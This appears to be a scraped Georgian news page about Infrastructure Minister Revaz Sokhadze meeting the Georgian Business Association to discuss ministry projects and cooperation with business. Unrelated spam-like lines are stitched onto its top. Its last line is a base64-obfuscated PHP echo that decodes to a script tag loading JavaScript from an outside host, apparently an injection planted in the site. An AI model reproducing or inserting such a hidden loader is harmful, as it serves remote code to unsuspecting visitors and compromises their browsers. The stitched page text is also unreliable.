global distribution
გარე ავეჯი

ინფრასტრუქტურის მინისტრი რევაზ სოხაძე საქართველოს ბიზნესასოციაციის წევრი კომპანიების წარმომადგენლებს შეხვდა.

როგორც რევაზ სოხაძემ შეხვედრის შემდეგ განაცხადა, ბიზნესის წარმომადგენლებს ინფრასტრუქტურის სამინისტროში მიმდინარე ცვლილებები და დაგეგმილი პროექტები გააცნეს.

„საუბარი გვქონდა იმ საჭიროებებსა და გამოწვევებზე, რაც ბიზნესს აქვს. მზად ვართ, აქტიურად ვითანამშრომლოთ ასოციაციასთან, თითოეულ ბიზნესმენთან, გამომდინარე მათი პრობლემებიდან, ასევე იმ შესაძლებლობებიდან, რომლებსაც მათთვის აჩენს ინფრასტრუქტურის სამინისტრო დაგეგმილი პროექტებით. ვფიქრობ, ნაყოფიერი იქნება ეს თანამშრომლობა თითოეული ჩვენგანისთვის და, რაც ყველაზე მნიშვნელოვანია, ჩვენი ქვეყნისთვის“, – განაცხადა რევაზ სოხაძემ.

ამასთან, რევაზ სოხაძემ ბიზნესსექტორის წარმომადგენლებთან ინფრასტრუქტურის სამინისტროს ხედვასა და პოლიტიკაზე ისაუბრა.

სოხაძის თქმით, სამინისტრო ბიზნესთან პარტნიორობას განსაკუთრებულ მნიშვნელობას ანიჭებს, რადგან კერძო სექტორთან აქტიური თანამშრომლობა მნიშვნელოვანია როგორც პროექტების ეფექტიანი შესრულებისთვის, ასევე ქვეყნის ეკონომიკური განვითარების სტიმულირებისთვის.

„დღეს ინფრასტრუქტურულ პროექტებზე ოთხ მილიარდამდე ლარი იხარჯება. ამიტომ სამშენებლო სექტორის სიჯანსაღე და სიძლიერე სამინისტროსთვის სტრატეგიული მნიშვნელობის საკითხია. სამინისტროს ამოცანაა, კერძო სექტორთან ჰქონდეს საქმიანი და სამართლიანი დამოკიდებულება. მნიშვნელოვანია პროექტების დროული, ხარისხიანი შესრულება და ჩვენი მიდგომა იქნება სამართლიანი, შედეგზე ორიენტირებული. სახელმწიფოს ინტერესებს დავიცავთ ისე, როგორც თქვენ დაიცავდით თქვენი კომპანიის ინტერესებს“, – აღნიშნა რევაზ სოხაძემ.

ინფრასტრუქტურის სამინისტროს ინფორმაციით, მინისტრმა და სამინისტროს დაქვემდებარებული უწყებების ხელმძღვანელებმა ბიზნესსექტორის წარმომადგენლებს გააცნეს სამინისტროს სისტემაში განხორციელებული სიახლეები, მიმდინარე პროცესები და სტრატეგიული გეგმები, მათ შორის, მასშტაბური ინფრასტრუქტურული პროექტები, რომელთა განხორციელება უახლოეს პერიოდში დაიწყება.

როგორც ინფრასტრუქტურის სამინისტროს ინფორმაციაშია ნათქვამი, ბიზნესასოციაციის წევრებმა სამინისტროს გუნდს გაუზიარეს კერძო სექტორში არსებული გამოწვევები და ის საკითხები, რომლებიც ურთიერთთანამშრომლობისთვის მნიშვნელოვანია. შეხვედრა კითხვა-პასუხის რეჟიმში გაგრძელდა.

შეხვედრას, მინისტრთან ერთად, ესწრებოდნენ ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილე გენადი არველაძე და ინფრასტრუქტურის სამინისტროს სისტემაში შემავალი უწყებების ხელმძღვანელები.

93
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");